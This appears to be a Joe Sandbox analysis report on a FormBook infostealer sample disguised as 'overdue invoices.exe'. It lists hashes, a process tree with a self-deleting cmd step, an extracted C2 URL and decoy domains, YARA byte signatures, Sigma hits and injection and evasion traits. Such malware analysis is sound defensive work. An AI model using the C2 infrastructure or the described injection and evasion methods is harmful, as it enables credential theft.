Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
overdue invoices.exe

Overview

General Information

Sample Name:overdue invoices.exe
Analysis ID:562159
MD5:e53e6bdf25f7c3bca385a3021e373061
SHA1:3c91623488f8e645d8f55b802c78c46a86e968da
SHA256:a2e21d596824ac07de0a0835065fdf00bce5b233c537355edc49e7c10f7b8667
Tags:exeFormbookxloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • overdue invoices.exe (PID: 5240 cmdline: "C:\Users\user\Desktop\overdue invoices.exe" MD5: E53E6BDF25F7C3BCA385A3021E373061)
    • overdue invoices.exe (PID: 6680 cmdline: "C:\Users\user\Desktop\overdue invoices.exe" MD5: E53E6BDF25F7C3BCA385A3021E373061)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • svchost.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • cmd.exe (PID: 5964 cmdline: /c del "C:\Users\user\Desktop\overdue invoices.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • explorer.exe (PID: 4768 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.storenight.store/rh64/"], "decoy": ["apx-consultoria.com", "naweekjanel.quest", "redcrossedgames.com", "braswellrestaurantgroup.com", "kakazaixian.com", "northernnightsky.com", "pauschalreisen.xyz", "getloyalclients.com", "fuckinggril.xyz", "kovtor.com", "harshalkadam.com", "lihsin.com", "blablacar-official.online", "zaratepsicologia.online", "taijaswanston.com", "babytono.com", "sunnycraftsman.com", "shicharroz.com", "dollytrailer.com", "vende-digital.com", "isaacsrealestate.net", "crecerspa.com", "themeraptor.com", "ptjl888.com", "iwanster.com", "shallmavis.com", "myowncorks.com", "centscert.com", "mysalonphotography.com", "goetzerehnstiftung.net", "hsee-sl.com", "bestuk-fixedrates.com", "atspom.com", "clashofclansapk.net", "pipszone.com", "graburballz.com", "petektemizlemehizmeti.com", "balancebybita.com", "cfdphind.com", "fsg-trading.com", "christinascleaningsvcsfl.com", "textile.wiki", "446321.com", "radiomuskan.com", "crystaltopagent.net", "andrewspellman.xyz", "afroonline.net", "shurommo.com", "obesite-morlaix.com", "encodexbd.com", "novemed.com", "perfumeghor.com", "dharma33.com", "potoobrant.com", "pravozachitapotreb.store", "enrevologix.net", "animositiesscale.info", "webgem-strategies.com", "ruralspices.com", "bibipopiah.com", "livebtctrades.com", "cannabisconnectionmt.com", "ammarus.com", "buildandrise.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.overdue invoices.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.overdue invoices.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.overdue invoices.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.overdue invoices.exe.400000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.overdue invoices.exe.400000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          System Summary

          barindex
          Sigma detected: Suspect Svchost Activity
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\overdue invoices.exe" , ParentImage: C:\Users\user\Desktop\overdue invoices.exe, ParentProcessId: 6680, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7072
          Sigma detected: Suspicious Svchost Process
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\overdue invoices.exe" , ParentImage: C:\Users\user\Desktop\overdue invoices.exe, ParentProcessId: 6680, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7072
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\overdue invoices.exe" , ParentImage: C:\Users\user\Desktop\overdue invoices.exe, ParentProcessId: 6680, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7072

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.storenight.store/rh64/"], "decoy": ["apx-consultoria.com", "naweekjanel.quest", "redcrossedgames.com", "braswellrestaurantgroup.com", "kakazaixian.com", "northernnightsky.com", "pauschalreisen.xyz", "getloyalclients.com", "fuckinggril.xyz", "kovtor.com", "harshalkadam.com", "lihsin.com", "blablacar-official.online", "zaratepsicologia.online", "taijaswanston.com", "babytono.com", "sunnycraftsman.com", "shicharroz.com", "dollytrailer.com", "vende-digital.com", "isaacsrealestate.net", "crecerspa.com", "themeraptor.com", "ptjl888.com", "iwanster.com", "shallmavis.com", "myowncorks.com", "centscert.com", "mysalonphotography.com", "goetzerehnstiftung.net", "hsee-sl.com", "bestuk-fixedrates.com", "atspom.com", "clashofclansapk.net", "pipszone.com", "graburballz.com", "petektemizlemehizmeti.com", "balancebybita.com", "cfdphind.com", "fsg-trading.com", "christinascleaningsvcsfl.com", "textile.wiki", "446321.com", "radiomuskan.com", "crystaltopagent.net", "andrewspellman.xyz", "afroonline.net", "shurommo.com", "obesite-morlaix.com", "encodexbd.com", "novemed.com", "perfumeghor.com", "dharma33.com", "potoobrant.com", "pravozachitapotreb.store", "enrevologix.net", "animositiesscale.info", "webgem-strategies.com", "ruralspices.com", "bibipopiah.com", "livebtctrades.com", "cannabisconnectionmt.com", "ammarus.com", "buildandrise.com"]}
          Multi AV Scanner detection for submitted file
          Source: overdue invoices.exeVirustotal: Detection: 35%Perma Link
          Source: overdue invoices.exeReversingLabs: Detection: 25%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.storenight.store/rh64/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dllVirustotal: Detection: 19%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dllReversingLabs: Detection: 16%
          Machine Learning detection for sample
          Source: overdue invoices.exeJoe Sandbox ML: detected
          Source: 20.0.explorer.exe.88e796c.8.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.overdue invoices.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.0.explorer.exe.88e796c.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.88e796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.overdue invoices.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.overdue invoices.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.overdue invoices.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.overdue invoices.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.overdue invoices.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.0.explorer.exe.88e796c.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 11.2.svchost.exe.2c16000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.overdue invoices.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 11.2.svchost.exe.383796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.overdue invoices.exe.21a0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.overdue invoices.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: overdue invoices.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: overdue invoices.exe, 00000000.00000003.349969071.000000001AE60000.00000004.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000000.00000003.347174579.000000001ACD0000.00000004.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.444112961.0000000000A8F000.00000040.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.442747025.0000000002F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.444455468.0000000003100000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: overdue invoices.exe, overdue invoices.exe, 00000001.00000002.444112961.0000000000A8F000.00000040.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.442747025.0000000002F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.444455468.0000000003100000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: overdue invoices.exe, 00000001.00000002.445807622.0000000002AA0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: overdue invoices.exe, 00000001.00000002.445807622.0000000002AA0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 4x nop then pop edi1_2_004162D8
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 4x nop then pop ebx1_2_00406AB6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx11_2_02996AB6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi11_2_029A62D8

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.storenight.store/rh64/
          Source: explorer.exe, 00000014.00000000.613469189.0000000007905000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.589957774.0000000007905000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.591242459.0000000007A93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.576966746.0000000007AA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.580691448.0000000007AA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.586467444.0000000007AA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.612578291.0000000007A92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.594365819.0000000007A93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.589641281.0000000007A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: overdue invoices.exe, overdue invoices.exe, 00000000.00000000.342336809.0000000000409000.00000008.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000001.00000000.346609456.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: overdue invoices.exe, 00000000.00000000.342336809.0000000000409000.00000008.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000001.00000000.346609456.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.389880290.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.357320779.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.420908981.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.371882109.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
